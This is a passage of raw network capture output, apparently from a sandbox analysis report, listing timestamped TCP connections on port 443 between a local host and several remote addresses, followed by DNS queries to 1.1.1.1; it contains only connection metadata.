                                                          Jan 24, 2024 15:34:32.922512054 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.922512054 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.922522068 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.923280001 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.923310041 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.923343897 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.923352003 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.923389912 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.923418045 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.923492908 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.924005985 CET49769443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.924022913 CET44349769104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.937628984 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.937741995 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.937809944 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.937808990 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.937829018 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.937871933 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.937922001 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.938030958 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.938102007 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.938159943 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.938169003 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.938237906 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.938304901 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.938311100 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.938358068 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.938421011 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:32.964845896 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:32.980488062 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.005723953 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.005840063 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.005861998 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.005902052 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.005909920 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.005947113 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.006263971 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.006313086 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.006355047 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.006403923 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.006409883 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.006450891 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.006989956 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.007035017 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.007062912 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.007081985 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.007086039 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.007268906 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.007895947 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.007960081 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.008709908 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.008744955 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.008766890 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.008774042 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.008801937 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.009465933 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.009497881 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.009514093 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.009521961 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.009530067 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.009536982 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.009567022 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.026546955 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.026587963 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.026604891 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.026608944 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.026659012 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.027487993 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.027519941 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.027549028 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.027555943 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.027582884 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.036359072 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.036636114 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.036696911 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.036725998 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.036750078 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.036762953 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.036789894 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.036819935 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.037261963 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.037313938 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.037343979 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.037378073 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.037384987 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.037637949 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.038187981 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.038320065 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.038383961 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.038391113 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.038469076 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.038527012 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.038532972 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.039012909 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.039084911 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.039093971 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.039098978 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.039149046 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.039154053 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.074244976 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.089912891 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.102358103 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.102365971 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.102406025 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.102433920 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.102440119 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.102492094 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.102499962 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.123780966 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.123836040 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.123842001 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.123887062 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.124087095 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.124145031 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.124768019 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.124793053 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.124828100 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.124830961 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.124895096 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.125564098 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.125612974 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.125622034 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.125663996 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.126435041 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.126476049 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.126504898 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.126516104 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.126545906 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.126545906 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.127151012 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.127681971 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.127721071 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.127737999 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.127747059 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.127855062 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.127883911 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.127912998 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.128123045 CET49770443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.128142118 CET44349770104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.135664940 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.136221886 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.136236906 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.136343956 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.136360884 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.136460066 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.136542082 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.136884928 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.136909008 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.136923075 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.136933088 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.137070894 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.137075901 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.137464046 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.137487888 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.137531042 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.137538910 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.137600899 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.138273001 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.138324976 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.138333082 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.138340950 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.138377905 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.139148951 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.139194965 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.139936924 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.139991999 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.140193939 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.140273094 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.155158043 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.155206919 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.155229092 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.155240059 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.155272007 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.155296087 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.156120062 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.156179905 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.156435966 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.156491995 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.235582113 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.235671997 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.237596035 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.237656116 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.253509045 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.253536940 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.253617048 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.253633022 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.253730059 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.254121065 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.254200935 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.254666090 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.254699945 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.254736900 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.254745007 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.254753113 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.255445004 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.255508900 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.255517006 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.255609989 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.256337881 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.256371975 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.256416082 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.256428003 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.256445885 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.256619930 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.257085085 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.308630943 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.341159105 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.341176033 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.341228962 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.341290951 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.341336012 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.341604948 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:33.341645002 CET44349771104.21.21.179192.168.2.6
                                                          Jan 24, 2024 15:34:33.341708899 CET49771443192.168.2.6104.21.21.179
                                                          Jan 24, 2024 15:34:44.050223112 CET49776443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:44.050261974 CET44349776172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:44.050327063 CET49776443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:44.050669909 CET49776443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:44.050678968 CET44349776172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:44.302889109 CET44349776172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:44.303297997 CET49776443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:44.303318977 CET44349776172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:44.303988934 CET44349776172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:44.304527044 CET49776443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:44.304600000 CET44349776172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:44.344978094 CET49776443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:34:51.149368048 CET49778443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:34:51.149398088 CET4434977852.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:34:51.149458885 CET49778443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:34:51.151459932 CET49778443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:34:51.151475906 CET4434977852.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:34:51.524086952 CET4434977852.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:34:51.524177074 CET49778443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:34:51.528594971 CET49778443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:34:51.528604031 CET4434977852.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:34:51.528858900 CET4434977852.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:34:51.531239986 CET49778443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:34:51.531543970 CET49778443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:34:51.531549931 CET4434977852.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:34:51.531799078 CET49778443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:34:51.573920012 CET4434977852.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:34:51.652617931 CET4434977852.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:34:51.652704954 CET4434977852.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:34:51.652812004 CET49778443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:34:51.653666973 CET49778443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:34:51.653687954 CET4434977852.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:34:55.598769903 CET49780443192.168.2.6142.250.105.104
                                                          Jan 24, 2024 15:34:55.598798037 CET44349780142.250.105.104192.168.2.6
                                                          Jan 24, 2024 15:34:55.598877907 CET49780443192.168.2.6142.250.105.104
                                                          Jan 24, 2024 15:34:55.600035906 CET49780443192.168.2.6142.250.105.104
                                                          Jan 24, 2024 15:34:55.600048065 CET44349780142.250.105.104192.168.2.6
                                                          Jan 24, 2024 15:34:55.815115929 CET44349780142.250.105.104192.168.2.6
                                                          Jan 24, 2024 15:34:55.815376043 CET49780443192.168.2.6142.250.105.104
                                                          Jan 24, 2024 15:34:55.815395117 CET44349780142.250.105.104192.168.2.6
                                                          Jan 24, 2024 15:34:55.815731049 CET44349780142.250.105.104192.168.2.6
                                                          Jan 24, 2024 15:34:55.816370964 CET49780443192.168.2.6142.250.105.104
                                                          Jan 24, 2024 15:34:55.816440105 CET44349780142.250.105.104192.168.2.6
                                                          Jan 24, 2024 15:34:55.860486984 CET49780443192.168.2.6142.250.105.104
                                                          Jan 24, 2024 15:34:59.289063931 CET44349776172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:59.289154053 CET44349776172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:34:59.289282084 CET49776443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:35:00.893728971 CET49776443192.168.2.6172.67.199.173
                                                          Jan 24, 2024 15:35:00.893755913 CET44349776172.67.199.173192.168.2.6
                                                          Jan 24, 2024 15:35:05.833131075 CET44349780142.250.105.104192.168.2.6
                                                          Jan 24, 2024 15:35:05.833204031 CET44349780142.250.105.104192.168.2.6
                                                          Jan 24, 2024 15:35:05.833252907 CET49780443192.168.2.6142.250.105.104
                                                          Jan 24, 2024 15:35:06.885062933 CET49780443192.168.2.6142.250.105.104
                                                          Jan 24, 2024 15:35:06.885091066 CET44349780142.250.105.104192.168.2.6
                                                          Jan 24, 2024 15:35:13.673516035 CET49781443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:35:13.673540115 CET4434978152.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:35:13.673604012 CET49781443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:35:13.675539970 CET49781443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:35:13.675556898 CET4434978152.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:35:14.044425964 CET4434978152.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:35:14.044555902 CET49781443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:35:14.047857046 CET49781443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:35:14.047877073 CET4434978152.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:35:14.048180103 CET4434978152.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:35:14.056257010 CET49781443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:35:14.056257010 CET49781443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:35:14.056279898 CET4434978152.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:35:14.056508064 CET49781443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:35:14.097903013 CET4434978152.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:35:14.176769018 CET4434978152.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:35:14.176867962 CET4434978152.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:35:14.177062035 CET49781443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:35:14.178883076 CET49781443192.168.2.652.159.126.152
                                                          Jan 24, 2024 15:35:14.178898096 CET4434978152.159.126.152192.168.2.6
                                                          Jan 24, 2024 15:35:20.238210917 CET49782443192.168.2.6172.253.124.101
                                                          Jan 24, 2024 15:35:20.238240957 CET44349782172.253.124.101192.168.2.6
                                                          Jan 24, 2024 15:35:20.238307953 CET49782443192.168.2.6172.253.124.101
                                                          Jan 24, 2024 15:35:20.238527060 CET49782443192.168.2.6172.253.124.101
                                                          Jan 24, 2024 15:35:20.238535881 CET44349782172.253.124.101192.168.2.6
                                                          Jan 24, 2024 15:35:20.459429979 CET44349782172.253.124.101192.168.2.6
                                                          Jan 24, 2024 15:35:20.459713936 CET49782443192.168.2.6172.253.124.101
                                                          Jan 24, 2024 15:35:20.459729910 CET44349782172.253.124.101192.168.2.6
                                                          Jan 24, 2024 15:35:20.460273981 CET44349782172.253.124.101192.168.2.6
                                                          Jan 24, 2024 15:35:20.460345030 CET49782443192.168.2.6172.253.124.101
                                                          Jan 24, 2024 15:35:20.460959911 CET44349782172.253.124.101192.168.2.6
                                                          Jan 24, 2024 15:35:20.461016893 CET49782443192.168.2.6172.253.124.101
                                                          Jan 24, 2024 15:35:20.462001085 CET49782443192.168.2.6172.253.124.101
                                                          Jan 24, 2024 15:35:20.462063074 CET44349782172.253.124.101192.168.2.6
                                                          Jan 24, 2024 15:35:20.462234020 CET49782443192.168.2.6172.253.124.101
                                                          Jan 24, 2024 15:35:20.462244987 CET44349782172.253.124.101192.168.2.6
                                                          Jan 24, 2024 15:35:20.507164955 CET49782443192.168.2.6172.253.124.101
                                                          Jan 24, 2024 15:35:20.672700882 CET44349782172.253.124.101192.168.2.6
                                                          Jan 24, 2024 15:35:20.674134016 CET44349782172.253.124.101192.168.2.6
                                                          Jan 24, 2024 15:35:20.674196959 CET49782443192.168.2.6172.253.124.101
                                                          Jan 24, 2024 15:35:20.674316883 CET49782443192.168.2.6172.253.124.101
                                                          Jan 24, 2024 15:35:20.674334049 CET44349782172.253.124.101192.168.2.6
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 24, 2024 15:33:52.702682972 CET5956453192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:52.702961922 CET5785353192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:52.703563929 CET4933253192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:52.703803062 CET5752253192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:52.756715059 CET53575761.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:52.821361065 CET53595641.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:52.821383953 CET53578531.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:52.822113991 CET53493321.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:52.822391033 CET53575221.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:53.486671925 CET53506921.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:54.602844000 CET5951953192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:54.603193045 CET5568953192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:54.724608898 CET53556891.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:54.975277901 CET53595191.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:55.081036091 CET6366153192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:55.081358910 CET5947053192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:55.199923992 CET53594701.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:55.199945927 CET53636611.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:56.129472971 CET4931553192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:56.130835056 CET5941053192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:56.139441013 CET5504453192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:56.140624046 CET6428353192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:56.248174906 CET53493151.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:56.250029087 CET53594101.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:56.257781982 CET53550441.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:56.258923054 CET53642831.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:57.672630072 CET5658953192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:57.674168110 CET5005753192.168.2.61.1.1.1
                                                          Jan 24, 2024 15:33:57.791496038 CET53565891.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:57.793143988 CET53500571.1.1.1192.168.2.6
                                                          Jan 24, 2024 15:33:59.197941065 CET5008453192.168.2.61.1.1.1
